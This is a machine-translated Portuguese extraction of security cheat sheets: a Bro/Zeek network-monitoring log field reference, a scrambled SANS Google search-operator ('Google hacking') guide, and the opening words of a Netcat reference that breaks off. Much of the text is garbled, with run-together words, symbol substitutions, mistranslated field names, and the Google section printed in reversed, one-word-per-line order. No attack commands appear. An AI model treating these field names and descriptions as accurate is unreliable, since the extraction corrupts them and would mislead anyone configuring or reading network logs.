smtp.log usuário corda Nome de usuário para o proxy, se disponível
Transações SMTP status corda Status do servidor para o servidor de e-mail usando proxy

solicitação.endereço do host Endereço solicitado pelo cliente

Campo TipoDescrip=on
solicitação.nome string Nome solicitado pelo cliente
é &meTimestampquandoamensagemfoivistapelaprimeira
solicitação_p porta Porta solicitada pelo cliente
id&id vezInformaçõessubjacentesdeconexão- Consulteconn.log
vinculado.host endereço Endereço vinculado ao servidor
profundidade_trans countTransac&ondepthsehouveremul&emsgs
string nome_limitado Nome do servidor
Olá

correio de stringConteúdodocabeçalhoHELOstringConteúdodocabeçalhoMAILFROMvinculado_p porta Porta de saída do servidor

rcpQo definir Conteúdo do cabeçalho RCPTTO

data stringConteúdodocabeçalhoDATE
software.log
Software identificado pela estrutura de software
de stringConteúdodocabeçalhoFROM
para definir Conteúdo do cabeçalho TO Campo TipoDescrip=on
é &meCarimbo de hora da detecção&on
responder_para_msg_id stringContentsoftheReplyToheaderstringContentsoftheMsgIDheader hospedar addr Endereço IP executando o software
in_reply_to stringContentsoftheIn-Reply- host_p porta Portanaqualosoftwareestáemexecução(paraservidores)
ToheaderstringContentsoftheSubjectheader
tipo_de_software stringTypeofsopware(por exemploHTTP::SERVER)
subjectx_origina=ng_ip Conteúdo do cabeçalho X-Origina&ng-IP
nome stringNomedosoftware
addr stringContentsofthefirstReceivedheader
versão.principal contagemNúmerodaversãoprincipaldosoftware
primeiro_recebido segundo_recebido stringConteúdodosegundoRecebidocabeçalho
versão.menor contagemnúmerodeversãomenordosoftware
caminho corda
versão.minor2 countMenorsubversionnumberofthesopware
last_reply LastservertoclientmessagevectorMessagetransmissionpath,fromheaders
versão.minor3 contagemMenornúmerodeatualizaçãodosoftware
agente do usuário stringValueoftheclientUser-
fluidos AgentheadervectorFileuniqueIDseena)anexadoathisismsg versão.addl stringVersãoadicionalstring(egbeta42)

é_webmail bool Se a mensagem foi enviada por webmail unparsed_version stringA versão completa e não analisada do software
46 38
3 ©BroalaLLC. Versão:2.0
Machine Translated by Google
Bro 2.3 Registros
ssh.log www.broala.com
Apertos de mão SSH
repórter.log
Erros e avisos internos do Bro
Tipo de campoDescrip =on
é &meCarimbo de data/hora em que a conexão SSH foi detectada Campo TipoDescrip=on
id&id Informações de conexão subjacentes - Veja conn.log é &meMessage&mstamp,ifavailable(0caso contrário)
status stringIftheloginwasheu é&callyadivinhado como “sucesso” ou “falha”.
nível stringMessageseverity(Info,aviso,erro,etc.)
direc=on stringOutboundorinboundconnec&on
mensagem stringTexto da mensagem
cliente stringSopwarestringdoclientestringSopwarestringdoservidor
localização stringThescriptloca&onondeoeventoocorreu,sedisponível
servidor

resp_size countQuantidade de dados retornados pelo servidor

ssl.log x509.log
Apertos de mão SSL Detalhes do certificado SSL
Campo TipoDescrip=on
é
Campo Tipo Descrip=on
&meTimestampquandoaconexãoSSLfoiadetectadaInformaçõessubjacentesdaconexão-
é &meu Hora em que o certificado foi visto
id&id Consulteconn.log
versão stringSSLversionqueoservidorofereceu
eu ia
corda FileuniqueID.Veja files.log

cifra stringSSLciphersuitequeoservidorescolheu cer=ficado.versão contar Número da versão

curva stringEllip&ccurvetheserverchoseifusingECDH/ECDHE cer=ficado.serial corda Número de série

nome_do_servidor stringValueoftheServerNameIndicatorSSLextension cer=emissor.emissor corda Emissor

ID da sessão stringSessionIDoferecidopeloclientepararetomadadasessão&em cer=ficate.not_valid_before &me Tempo anterior quando o certificado

último_alerta stringÚltimo aviso que foi visto durante a conexão é inválido

estabelecido bool Esta conexão foi estabelecida com sucesso? cer=ficate.not_valid_a[er &me Timeaperquandoocertificadoéinválido

cadeia_cert vectorChainofcertificatesoferecidosporservidor
cer=ficate.key_alg corda Nomedoalgoritmochave
cert_chain_fluidos vectorFileuniqueIDsforcertsin cert_chain. Veja files.log

cadeia_de_certificação_do_cliente vetorChainofcer&ficatesoferecidopelocliente cer=ficate.sig_alg corda Nomedoalgoritmodeassinatura

client_cert_chain_fuids vectorFileUIDsforcertsin client_cert_chain. Veja files.log cer=tipo_de_chave corda Tipo de chave (RSA, DSA ou EC)

assunto stringAssuntodocertificadoX.509oferecidopeloservidor cer=ficado.comprimento_da_chave contar Comprimento da chave, bits

emissor stringAssuntodosignatáriodocertificadodoservidor cer=exponente.expoente corda Expoente,ifRSA

assunto_cliente stringAssuntodocertificadoX.509oferecidopelocliente cer=curva.certificado corda Curva, se EC

cliente_emissor_assunto stringAssuntodosignatáriodocertificadocliente san.dns string_vec Lista de entradas DNS no assunto
valida=on_status stringCert&ficatevalida&onresultforthishandshake Alterna&veName(SAN)

status_ocsp stringResultofOCSPvalida&onforthishandshake san.uri string_vec Lista de entradas URI em SAN

ocsp_resposta stringOCSPrespostacomoumastring san.email string_vec Lista de entradas de e-mail em SAN

san.ip addr_vec Lista de entradas de IP em SAN

túnel.log restrições_básicas.ca bool
Detalhes dos túneis de encapsulamento Conjunto de bandeiras CA?

basic_constraints.path_len contagem Comprimento máximo do caminho

Campo TypeDescrip=on &me
é
id&id
TimestamptunnelwasdetectedUnderlyingconnec&oninfo-
Veja conn.log
Outros Logs
tunnel_type stringO tipo de túnel (por exemplo, Teredo, IP) stringA atividade Registro Descrip=on
ação=em que ocorreu (descoberta, fechada) estatísticas do aplicativo Sta=s=csonusodeaplicativoswebpopulares
conjunto Diagnóstico=csforclusteropera=on
estranho.log communica=onDiagnos=csforinter-processcommunica=ons
Anomalias e violações de protocolo dpd Diagnóstico=csfordynamicprotocoldetec=on

FieldTypeDescrip=ativado certificados_conhecidos ObservedlocalSSLcerts.Each é registrado uma vez/dia

dispositivos_conhecidos Dispositivos locais observados. Cada um é registrado uma vez por dia
é &meCarimbo de data/hora da mensagem
hosts_conhecidos Observadolocalac=veIPs.Each está registrado uma vez/dia
id&id Informações de conexão subjacentes - Veja conn.log
serviços_conhecidos Observedlocalservices.Each está conectado uma vez/dia
nome stringO nome do estranho que ocorreustringInformações adicionais
scripts carregados Umalistadescriptsqueforamcarregadosnainicialização
adicionar que acompanham o estranho, se houver
filtro_de_pacotes Quaisquer filtros para limitar o tráfego que está sendo analisado
não=ce bool Indique se esse estranho também foi transformado em um&ce
estatísticas Diagnos=cssuchasmemusage,packetsseen,etc.
par stringOparquegerouesteestranho
log do sistema Mensagens Syslog
traçar rota Hosts executando traceroute

Para promover sua ampla distribuição, este trabalho é licenciado sob a Licença Interna Creative Commons A)ribu&on-NonCommercial-ShareAlike4.0(h)p://
crea&vecommons.org/licenses/by-nc-sa/4.0/).WeatBroala está comprometido em ajudar você a entender o Bro ao máximo para que você possa ser um herói da monitoração.

47 39
4 ©BroalaLLC. Versão:2.0
Machine Translated by Google
Bro Logs
app_stats.log dns.log www.CriticalStack.com
Estatísticas sobre o uso de aplicativos da web popularesDetalhes da consulta/resposta DNS
Campo Tipo Descrição Campo Tipo Descrição
é medição de tempo carimbo de data/hora é hora Carimbo de data/hora da solicitação DNS

ts_delta intervalo Diferença de tempo da medição anterior uid string ID exclusivo da conexão

aplicativo string Nome do aplicativo (YouTube, Netflix, etc.) gravar

eu ia
Registro de ID com orig/resp host/port. Veja conn.log
uniq_hosts count Número de hosts exclusivos que usaram o aplicativo e

sucessos contar Número de visitas ao aplicativo proto proto Protocolo de transação DNS – TCP ou UDP

bytes contagem Total de bytes transferidos para/do aplicativo trans_id conte o identificador de 16 bits atribuído pelo cliente DNS; as respostas correspondem

consulta string Nome de domínio assunto da consulta

captura_perda.log
classe q count Valor especificando a classe de consulta
Estimativa de perda de pacotes
qclass_name string Nome descritivo da classe de consulta (por exemplo, C_INTERNET)
Campo Tipo Descrição
tipo q count Valor especificando o tipo de consulta
é medição de tempo carimbo de data/hora
qtype_name string Nome do tipo de consulta (por exemplo, A, AAAA, PTR)
ts_delta intervalo Diferença de tempo da medição anterior
código r conte o valor do código de resposta na resposta DNS
par string Nome da instância Bro relatando perda
rcode_name string Nome descritivo do código de resposta (por exemplo, NOERROR, NXDOMAIN)
lacunas contar ACKs vistos sem ver os dados sendo ACKed

acks contar Número total de ACKs TCP

Código QR bool Isso foi uma consulta ou uma resposta? T = resposta, F = consulta

AA bool Resposta Autoritativa. T = servidor é autoritativo para consulta

percent_loss string gaps/acks, como uma porcentagem. Estimativa de perda.
TC Truncamento bool. T = mensagem foi truncada
dhcp.log RD bool Recursão desejada. T = solicitação de pesquisa recursiva de consulta
Atividade de concessão RA bool Recursão disponível. T = servidor suporta consultas recursivas
Campo DHCP Tipo Descrição Z contagem Campo reservado, deve ser zero em todas as consultas e respostas
é hora Carimbo de data/hora da solicitação respostas vetor Lista de descrições de recursos em resposta à consulta
uid ID exclusivo da conexão de string TTLs vetor Intervalos de cache das respostas
eu ia
registro ID registro com orig/resp host/porta. Veja conn.log rejeitado bool Se a consulta DNS foi rejeitada pelo servidor
Mac corda Endereço de hardware do cliente

assigned_ip addr Endereço IP real atribuído ao cliente

conn.log: estado_conn
intervalo lease_time Tempo de concessão do endereço IP
Significado do estado
trans_id conta Identificador atribuído pelo cliente; as respostas correspondem
S0 Tentativa de conexão vista, sem resposta

conn.log Detalhes S1 Conexão estabelecida, não encerrada (contagem de 0 bytes)

de conexão IP, TCP, UDP e ICMP Tipo de campo Descrição SF Estabelecimento e término normais (contagens de >0 bytes)
REJ Tentativa de conexão rejeitada

é tempo Carimbo de data/hora

S2 Estabelecido, ORIG tenta fechar, sem resposta do RESP.

uid corda ID exclusivo da conexão

S3 Estabelecido, RESP tenta fechar, sem resposta da ORIG.

id.orig_h endereço Endereço IP do ponto final de origem (também conhecido como ORIG) RSTO estabelecido, ORIG abortado (RST)

id.orig_p porta Porta TCP/UDP do ponto de extremidade de origem (ou código ICMP) RSTR estabelecido, RESP abortado (RST)

id.resp_h endereço Endereço IP do ponto final de resposta (também conhecido como RESP)
RSTOS ORIG enviou SYN e depois RST; sem RESP SYN-ACK
0
id.resp_p porta Porta TCP/UDP do ponto de extremidade de resposta (ou código ICMP)
RSTRH RESP enviou SYN-ACK e depois RST; sem ORIG SYN
proto transporte Protocolo de conexão da camada de transporte
E ORIG enviou SYN e depois FIN; sem RESP SYN-ACK (“meio aberto”)
_proto
serviço corda Protocolo de aplicação detectado dinamicamente , se houver SHR RESP enviou SYN-ACK e depois FIN; sem ORIG SYN

duração intervalo Hora do último pacote visto – hora do primeiro pacote visto OTH Sem SYN, não fechado. Tráfego de midstream. Parcial
conexão.
bytes_origem contar Bytes de carga útil do originador; de números de sequência se TCP

bytes de resp contar Bytes de carga útil do respondedor; de números de sequência se TCP
conn.log: histórico
estado_conn corda Estado da conexão (consulte a tabela conn.log:conn_state )
Orig MAIÚSCULAS, Resp minúsculas, uniq-ed
origem_local bool Se conn originou localmente T; se remotamente F.
Se Site::local_nets estiver vazio, sempre não definido.
Significado da letra
histórico de contagem de Número de bytes ausentes em lacunas de conteúdo
S um SYN sem o bit ACK definido
corda Histórico de estado de conexão (consulte a tabela conn.log:history )
O um SYN-ACK (“aperto de mão”)
missing_bytes contar Número de pacotes ORIG
UM um ACK puro
orig_pkts contagem de Número de bytes ORIG IP (via campo de cabeçalho IP total_length)
E pacote com carga útil (“dados”)
orig_ip_bytes contar Número de pacotes RESP
F pacote com conjunto de bits FIN
resp_pkts contagem de Número de bytes de IP RESP (por meio do campo de cabeçalho IP total_length)
R pacote com conjunto de bits RST
resp_ip_bytes tunnel_parents set Se em túnel, UID de conexão do(s) pai(s) encapsulador(es)
C pacote com uma soma de verificação incorreta
origem_cc corda Código de país ORIG GeoIP
EU
Pacote inconsistente (SYN e RST)
resp_cc corda Código de país RESP GeoIP
48 40
1 © 2014 Critical Stack LLC. Todos os direitos reservados. Versão: 2.3
Machine Translated by Google
Bro Logs
known_certs.log Certificados www.CriticalStack.com
known_hosts.log IPs ativos
locais observados; registrados 1xDia locais observados; registrado 1xDay
Campo Tipo Descrição Campo Tipo Descrição

é é tempo Carimbo de data/hora visto pela primeira vez

medição de tempo carimbo de data/hora
hospedar endereço Endereço IP do host
hospedar addr Endereço que ofereceu o certificado

num_porta porta Se o servidor, porte esse servidor escutando

raio.log
Detalhes de autenticação do Radius
assunto Assunto do certificado de sequência
Campo Tipo Descrição
issuer_subject string Assunto do emissor do certificado
é tempo Carimbo de data e hora da detecção
serial string Número de série do certificado uid string ID exclusivo para a conexão

eu ia
Registro de ID conn_id com orig/resp host/port. Veja conn.log
serviços_conhecidos.log nome de usuário string O nome de usuário, se presente
Serviços locais observados; registrado 1xDia
Mac endereço MAC da string, se presente

Campo Tipo Descrição IP_remoto addr Remtoe endereço IP, se presente

é tempo Carimbo de data/hora conectar_info string Informações de conexão, se presente

hospedar endereço resultado corda Autenticação bem-sucedida ou com falha

Endereço do host no qual o serviço está sendo executado

port_num porta Número da porta na qual o serviço está sendo executado logado bool Se isso já foi registrado e ignorado

transporte port_proto O serviço de protocolo da camada de transporte utiliza

_proto reporter.log Bro
serviço definir Conjunto de protocolo(s) que correspondem às cargas de erros internos e avisos
conexão do serviço
Campo Tipo Descrição
modbus.log é tempo Carimbo de data/hora da mensagem

Solicitações de PLC (controle industrial) nível string Gravidade da mensagem (Informação, aviso, erro, etc.)

Campo Tipo Descrição sequência de mensagens Texto da mensagem

é hora Carimbo de data/hora da solicitação localização string O local do script onde tevent ocorreu, se disponível
uid ID exclusivo da conexão de string
eu ia
registro ID registro com orig/resp host/porta. Veja conn.log smtp.log
função string Função mensagem que foi enviada Transações SMTP
string de exceção Exceção se houver falha
Campo Tipo Descrição
notice.log Avisos é hora Carimbo de data e hora em que a mensagem foi vista pela primeira vez

registrados Tipo de uid ID exclusivo da conexão de string

campo Descrição eu ia
registro ID registro com orig/resp host/porta. Veja conn.log

é tempo Carimbo de data/hora profundidade_trans conte a profundidade da transação da mensagem se várias mensagens forem transferidas

uid corda ID exclusivo de conexão Olá string Conteúdo do cabeçalho HELO

eu ia registro Registro de ID com orig/resp host/port. Veja conn.log correio de string Conteúdo do cabeçalho MAIL FROM

RCPTTO definir Conteúdo do cabeçalho RCPT TO

fluido corda Identificador exclusivo do arquivo data string Conteúdo do cabeçalho DATE
sequência de caracteres file_mime_type Tipo de arquivo sniffed pelo Libmagic de string Conteúdo do cabeçalho FROM
arquivo_desc corda Contexto adicional para arquivo, se disponível para definir Conteúdo do cabeçalho TO
proto transporte Protocolo de transporte
reply_to string Conteúdo do cabeçalho ReplyTo string Conteúdo
_proto
msg_id do cabeçalho MsgID string Conteúdo do cabeçalho
observação corda O tipo de aviso
in_reply_to In-Reply-To string Conteúdo do cabeçalho Subject
mensagem corda Mensagem legível para o aviso
assunto
sub corda Submensagem para o aviso
x_originating_ip addr Conteúdo do cabeçalho X-Originating-IP first_received
fonte endereço Endereço de origem
string Conteúdo do primeiro cabeçalho Recebido
horário de verão endereço Endereço de destino
second_received string Conteúdo do segundo cabeçalho Received
p porta Porta associada, se houver
última_resposta string Última mensagem que o servidor enviou ao cliente
não contar Contagem associada ou código de status
caminho vetor Caminho de transmissão da mensagem, extraído dos cabeçalhos
descrição_de_pares corda Descrição para o par que levantou esta notificação
agente do usuário string Valor do cabeçalho User-Agent do cliente
ações definir Ações aplicadas a este aviso
tls A conexão bool mudou para usar TLS
suprimir_para intervalo Período de tempo em que os dupes devem ser
fluidos IDs exclusivos do arquivo vetorial vistos anexados a esta mensagem
suprimidos

derrubado bool Se o IP src foi bloqueado é_webmail bool Indica se a mensagem foi enviada por meio de uma interface de webmail

49 41
3 © 2014 Critical Stack LLC. Todos os direitos reservados. Versão: 2.3
Machine Translated by Google
Bro Logs
www.CriticalStack.com
signatures.log software.log Software
Correspondências da estrutura de assinatura identificado pela estrutura de software
Campo Tipo Descrição Campo Tipo Descrição
é hora Carimbo de data/hora da partida é hora Carimbo de data/hora da detecção

endereço_origem addr Host acionando o evento de correspondência de assinatura hospedar addr endereço IP executando o software

porta_origem porta Porta do host na qual a correspondência ocorreu host_p porta Porta na qual o software está sendo executado (para servidores)

dst_addr addr Host ao qual foi enviada a carga útil correspondente tipo_de_software string Tipo de software (por exemplo, HTTP::SERVER)
porta_dst porta Porta para a qual foi enviada a carga correspondente nome string Nome do software
observação string Aviso associado ao evento de assinatura
versão.principal conte o número da versão principal do software
string Nome da assinatura que correspondeu a sig_id versão.menor conte o número da versão secundária do software
event_msg string Mensagem mais descritiva do evento
versão.minor2 conte o número de subversão menor do software
sub_msg string Dados de carga útil extraídos ou mensagem extra
versão.minor3 conte o número de atualização secundária do software
sig_count contar Número de assinaturas
versão.addl string String de versão adicional (por exemplo, beta42)
host_count contagem Número de hosts
unparsed_version string A versão completa e não analisada do software

snmp.log
Comunicação SNMP ssh.log
Apertos de mão SSH
Campo Tipo Descrição
é time Timestamp tunnel foi detectado string Connection
Campo Tipo Descrição
uid id exclusivo é tempo Carimbo de data e hora em que a conexão SSH foi detectada
eu ia
Registro de ID conn_id com host/porta orig/resp. Veja conn.log intervalo uid corda ID exclusivo de conexão
duração Quantidade de tempo entre o primeiro/último pacote na sessão
eu ia registro Registro de ID com host/porta orig/resp. Veja conn.log Se o
versão string A versão do SNMP que está sendo usada
status corda login foi heuristicamente adivinhado como um “sucesso” ou uma “falha”.
comunidade string Cadeia de caracteres da comunidade do primeiro pacote SNMP associado à
sessão; somente v1 e v2c count
corda de direção Conexão de saída ou entrada
obter_solicitações Número de ligações de variáveis em GetRequest/Next get_bulk_requests
cliente corda Sequência de software do cliente
count Número de ligações de variáveis em GetBulkRequest PDU count Número de ligações de variáveis em
servidor corda Sequência de software do servidor
obter_respostas GetResponse/Response PDUs
resp_size count Quantidade de dados retornados pelo servidor

set_requests contagem Número de ligações de variáveis em PDUs SetRequest string

meias.log
display_string Descrição do sistema do ponto de extremidade do respondedor SNMP
Solicitações de proxy SOCKS
up_since tempo Tempo que o respondedor SNMP afirma que está ativo desde
Campo Tipo Descrição
ssl.log SSL
handshakes (somente v2.2; v2.3 x509.log) é tempo Carimbo de data e hora da solicitação

uid corda ID exclusivo de conexão

Campo Tipo Descrição
eu ia registro Registro de ID com orig/resp host/port. Veja conn.log
é hora Carimbo de data e hora em que a conexão SSL foi detectada
versão contar Versão do protocolo SOCKS
uid ID exclusivo da conexão de string
usuário corda Nome de usuário para proxy, se disponível
eu ia
registro ID registro com orig/resp host/porta. Veja conn.log
status Status do servidor para a tentativa usando proxy
versão versão SSL da string que o servidor ofereceu
solicitação de string.endereço do host Endereço solicitado pelo cliente
cifra conjunto de cifras SSL de string que o servidor escolheu
solicitação.nome string Nome solicitado pelo cliente
nome_do_servidor string Valor da extensão SSL do indicador de nome do servidor
solicitação_p porta Porta solicitada pelo cliente
ID da sessão string ID da sessão oferecida pelo cliente para retomada da vinculado.host endereço Endereço vinculado ao servidor
sessão
string bound.name Nome vinculado ao servidor
assunto string Assunto do certificado X.509 oferecido pelo servidor
vinculado_p porta Porta vinculada ao servidor
issuer_subject string Assunto do signatário do certificado oferecido pelo servidor

não_válido_antes tempo Valor do campo NotValidBefore do certificado do servidor

syslog.log
não_válido_depois tempo Valor do campo NotValidAfter do certificado do servidor
Mensagens Syslog
último_alerta string Último alerta que foi visto durante a conexão
Tipo de campo Descrição
client_subject string Assunto do certificado X.509 oferecido pelo cliente clnt_issuer_subject
é tempo Carimbo de data e hora em que a mensagem foi vista
string Assunto do signatário do certificado oferecido pelo cliente
uid corda ID exclusivo de conexão
string MD5 hash do certificado do servidor bruto
eu ia registro Registro de ID com orig/resp host/port. Veja conn.log
vetor Validação do certificado para esta conexão
status_de_validação_cert_hash
proto transporte_prot Protocolo sobre o qual a mensagem foi vista. Atualmente, apenas
o UDP é suportado.
stderr.log / stdout.log facilidade corda Recurso Syslog para a mensagem
Descrição cadeia de gravidade Gravidade do Syslog para a mensagem

Erro / registro de saída - LogAscii::output_to_stdout = F &redef sequência de mensagens A mensagem syslog de texto simples 50 42
4 © 2014 Critical Stack LLC. Todos os direitos reservados. Versão: 2.3
Machine Translated by Google
Bro Logs
traceroute.log Hosts www.CriticalStack.com
executando traceroute Tipo de
campo Descrição
é tempo O registro de data e hora do traceroute foi detectado
Entre em contato com a Critical Stack
fonte endereço Endereço que inicia o traceroute

horário de verão endereço Endereço de destino do traceroute

Descrição do comando
proto corda Protocolo usado para o traceroute Telefone: 202-559-5200
E-mail: [email protected]
tunnel.log Detalhes
de encapsulamento de túneis Rede: http://www.CriticalStack.com
Campo Tipo Descrição Git: https://github.com/CriticalStack/
é tempo O túnel de carimbo de data/hora foi detectado
Twitter: @CriticalStack
uid ID exclusivo da conexão de string
eu ia
ID do registro registro com orig/resp host/porta. Veja conn.log tunnel_type pgp 0xc255d63501b80df9
string O tipo de túnel (por exemplo, Teredo, IP) string A atividade que ocorreu
Ação (descoberta, fechada)

Índice
x509.log Saída
do analisador de certificado x509 Registro Descrição da página
estatísticas do aplicativo 1 Estatísticas sobre o uso de aplicativos da web populares
Campo Tipo Descrição
captura_perda 1 Estimativa de perda de pacotes
é tempo Carimbo de data e hora da detecção
conjunto Diagnóstico para operação de cluster
eu ia
Corda ID do arquivo deste certificado
comunicação Diagnóstico para comunicações entre processos
certificado . registro Detalhes do certificado
conexão 1 Detalhes de conexão IP, TCP, UDP e ICMP
.versão contar Número da versão
dhcp 1 Atividade de concessão de DHCP

.serial corda Número de série 2

dnp3 Protocolo de rede distribuída (controle industrial)
.emissor corda Emissor do certificado DNS-e 1 Detalhes da consulta/resposta DNS

.não_valido_antes do tempo Carimbo de data/hora antes de o certificado não ser válido dpd Diagnóstico para detecção de protocolo dinâmico

.não_válido_após_tempo Carimbo de data/hora após o certificado não ser válido arquivos 2 Resultados da análise de arquivo

.chave_alg corda Nome do algoritmo chave ftp 2 Detalhes da solicitação/resposta de FTP

.sig_alg corda Nome do algoritmo de assinatura http 2 Detalhes da solicitação/resposta HTTP

.tipo_de_chave corda Tipo de chave, se a chave for analisável openssl (rsa, dsa ou ec) informação 2 Acertos em indicadores do framework Intel

.comprimento_da_chave contar Comprimento da chave em bits

irc 2 Detalhes de comunicação do IRC

.expoente corda Expoente, se certificado RSA 3 Certificados SSL locais observados . Cada um é registrado uma

.curva corda Curva, se certificado CE certificados_conhecidos vez/dia Dispositivos locais observados. Cada um é registrado

são. registro 3 uma vez/dia IPs ativos locais observados . Cada um é registrado
Assunto Nome Alternativo

.dns string_vec Lista de entradas DNS no SAN uma vez/dia

dispositivos_conhecidos hosts_conhecidos Serviços locais3observados. Cada um é registrado uma vez/
serviços_conhecidos

.uri string_vec Lista de entradas URI no SAN scripts carregados Uma lista de scripts que foram carregados nas

.e-mail Modbus-Modbus 3 solicitações de inicialização do PLC (controle industrial)

string_vec Lista de entradas de e-mail no SAN
perceber 3 Avisos registrados
.ip addr_vec Lista de entradas de IP no SAN

bool filtro_de_pacotes Quaisquer filtros para limitar o tráfego que está sendo analisado
.outros_campos Verdadeiro se o certificado contiver outros campos não reconhecidos
raio 3 detalhes de autenticação do raio
restrições básicas. registro Restrições básicas de extensão do certificado
repórter 3 Erros e avisos internos
.ca bool CA fla definido?

assinaturas 4 Correspondências da estrutura de assinaturas

.caminho_len contar Comprimento máximo do caminho
SMTP 3 Transações SMTP
logcert bool T (presente se policy/protocols/ssl/log-hostcerts-only.bro)
snmp 4 Comunicação SNMP

meias 4 Solicitações de proxy SOCKS

weird.log
Programas 4 Software identificado pela estrutura de software
Anomalias e violações de protocolo
ssh 4 Apertos de mão SSH
Descrição do tipo de campo 4
SSL-SSL ...
Apertos de mão SSL (somente v2.2; v2.3 x509.log)

é tempo Carimbo de data/hora da mensagem

estatísticas Diagnósticos como uso de memória, pacotes vistos, etc.

uid saída padrão 4 Registro de saída

corda ID exclusivo de conexão
registro 4 Mensagens Syslog
eu ia Registro de ID com orig/resp host/port. Veja conn.log log do sistema

O nome do estranho que ocorreu traçar rota 5 Hosts executando traceroute

sequência de nomes
adicionar corda Informações adicionais que acompanham o estranho, se houver túnel 5 Detalhes dos túneis de encapsulamento

aviso bool Indique se este estranho também foi transformado em um aviso x509 5 Saída do analisador de certificado x509

par corda O colega que gerou esse estranho esquisito 5 Anomalias e violações de protocolo 51 43
5 © 2014 Critical Stack LLC. Todos os direitos reservados. Versão: 2.3
 e

Valor
chesapeake
de
baía
veleiro palavras
as

Exemplos
e
Procurar
URLs
Google

Exemplo
Parâmetros

Encontra
Descrição
pesquisa
de
termo
o pesquisa
de
termo
O

veleiro,
Baía
Parâmetros
Hacking
Folha

saveiro palavra
a
ou 1
ou
0 Se

o
Machine Translated by Google

OU
GUIA

filtro

yawl
duplicados.
potencialmente
resultados

saveiro
seu”
o
um
cada
“A exata
frase
a Sharp
Stay
SANS
Programa

para
pesquisa
de
frase
uma um
como
é
apresentado
valor
O

-computador
vírus NÃO
mas
palavra
a precisa
Não
exata.
frase

aspas.
entre
coloque
http://

como_epq

,
Português

+III
Episódio
Wars
Star romance
o
incluindo
filme,
do
título
Este excluir
e
incluir
i= pesquisa.
na
excluído
ou
incluído
é
por
indicado
arquivo
de
tipo
O

víruscomputador
III
numeral

como_pé
rápida
referência
uma
ser
pretende
documento
Este

as_filetype
barco
de
~empréstimo sua
e
palavra
a
para
empréstimo
de
informações seus
Google,
do
operadores
os
todos
descrevendo
Propósito

sinônimos: arquivo
de
extensão
uma ou
incluído
está
arquivo
de
tipo
O uso.
seu
de
exemplos
e
significado
busca
na
excluído

definir:sarcástico palavra
da
definições por
indicado

barcocanoa, de
web
a

como_tipo_de_arquivo
título
para
links
URL
na
url
página
da
texto
corpo
lugar
em
=
qualquer especificado.
local
no
pesquisa
de
termo
o
Encontre
Para

Mac por
e
palavras
as o
descreve
que
útil
referência
uma
como
folha
esta
Use

X
Mac
palavra
uma
exatamente

como_oct
É
realizar.
pode
você
que
Google
do
pesquisas
várias

sortudo
sentindo
me
Estou web
da
página
primeira
a
para
diretamente
você
Leva
Hacking
Google
o
durante
lo
apoiá-
a
destinado
Google)
do
(Link consulta
sua
para
retornou página
a rápido
um
como
usado
ser
pode
Defesa
de
curso
e

Google
do
avançados
recursos
os
todos
sobre
atualização
e
referência
de
guia
excluir
e
incluir
i= incluído
está
por
indicado
domínio
ou
site
O
pode
também
aluno
O
curso.
neste
usados
operadores

como_dt
pesquisa.
na
excluídos
ou
inovadores
projetos
de
construção
na
orientação
como
folha
esta
use

as_sitesearch
busca.
técnicas
novas
e
operadores
de
combinações
domínio
ou
site ou
incluído
está
arquivo
de
tipo
O
busca
na
excluído
é

por
indicado
Esta

operadores
•de
seis
m6
meses
três
=
m3 em
com
atualizadas
páginas
Localize

como_pesquisa_no_site
especificado.
tempo
de
período
o •

como_qdr
passado
ano
y=
números
•de

calculadora
•de

pesquisa
de
•Parâmetros

refinesearch.html
help/
en/
intl/
www.google.com/
http://
johnny.ihackstuff.com
http://
Referências:

cheatsheet.html
help/
en/
intl/
www.google.com/
http://

2006
SANS
©Instituto

44
52
 O
1Z9999W99999999999

Pesquisa
site
um
apenas
Pesquisar

a
Pesquisa

site
Descrição

Operadores

site:
Números

Operadores
999999999999
números
intervalo
um
de
dentro
Pesquisar

e
$

[#]…
Machine Translated by Google

Números

99
9999

televisão
meses
de
intervalo
um
apenas
Pesquisar

e
6
3
de

de
data

data:
AAAAA999A9AA99999

adulto
conteúdo
Excluir
305214274002

vinculadas
páginas SANS)
da
site
ao
levam
que

safesearch:

pesquisa link:
202

página
uma
sobre
Informações SANS)
site
o
sobre
5123123
patente

informação:
relacionadas
Páginas Stanford)
de
site
ao
relacionados
sites "patente"
palavra
a
colocar
de
se
(Lembre-

link:www.sans.org
NúmerosCódigos CódigosNúmeros

patente)
de
número
seu
do
antes

página
da
título
no
strings
por
Pesquisa página)
da
título
no
"conference"
com

info:www.sans.org

relacionado:
n199ua

título:
avião
um
FAA
registro
de
(Número
Números

página
da
título
do
dentro
strings
as
todas
Pesquisa cauda)
sua
em
impresso
normalmente
é

e
intitle:conference
operadores)
outros
com
bem
combina
Não

allintitle:
PIR
B4Z-34009-
FCC

relacionado:www.stanford.edu
de
IDs

URL
na
strings
por
Pesquisa URL)
na
"conference"
string
a
com "fcc"
palavra
a
colocar
de
se
(Lembre-

URL
allintitle:conference
URL
da
dentro
strings
as
todas
Pesquisa

e
operadores)
outros
com
bem
combina
Não

tudourl:
inurl:conference
arquivo
de
extensão
essa
com
arquivos
por
Pesquisa "ppt".
extensão
a
com

tipo
PowerPoint.)
MS
do
arquivos
são
".ppt"

allinurl:conference
filetype:ppt
página
da
Google
do
cache
o
Exibir pesquisa)
realizar
sem
página
da
cache
em
versão
a
Digite

adição
+
+
45

Operadores

esconderijo:
Significado

Operadores

subtração
–
45

ou comerciais
e
residenciais
telefônicas
listas
as
todas
Exibir

lista
lista
pesquisas)
outras
com
combinar
possível
é
Não

rlista
*

cache:www.sans.org
*

multiplicação
45

telefônica:
divisão
/

notícias
grupo
postagem
uma
de
autor
o
Pesquisa mail.
e-
endereço
ou
autor
nome
no
"Rick"
com
notícias
de
grupo
do
postagens
as
todas
45 /

Group)
Google
do
pesquisa
uma
com
usado
ser
Deve

autor:
de
porcentagem
%

autor:Rick
45%

notícias
grupo
do
postagem
uma
de
assunto
no
apenas
Pesquisar
^

OS
potência
uma
a
elevar
2^5

potência)
quinta
à
elevado
(2

insubject:
frase
ou
palavra
da
definições
Várias sarcástico)
palavra
da
definição
a

insubject:Mac

definir:
ações
de
abreviação
uma
sobre
informações
Obtenha Inc.)
Computer,
Apple
da
ações
sobre

define:sarcastic

estoque:
estoque:AAPL

45
53
Machine Translated by Google

Português
Netcat

REFERÊNCIA
Por

Folha
dicas

BOLSO
de

GUIA
DE
Propósito

Fundamentos

ncat,

gnu
Esta e
Hobbit
Weld
folha e
a
560

[EndereçoIP
Conecte-
a – Crie[Porta Tanto
o
cliente

$
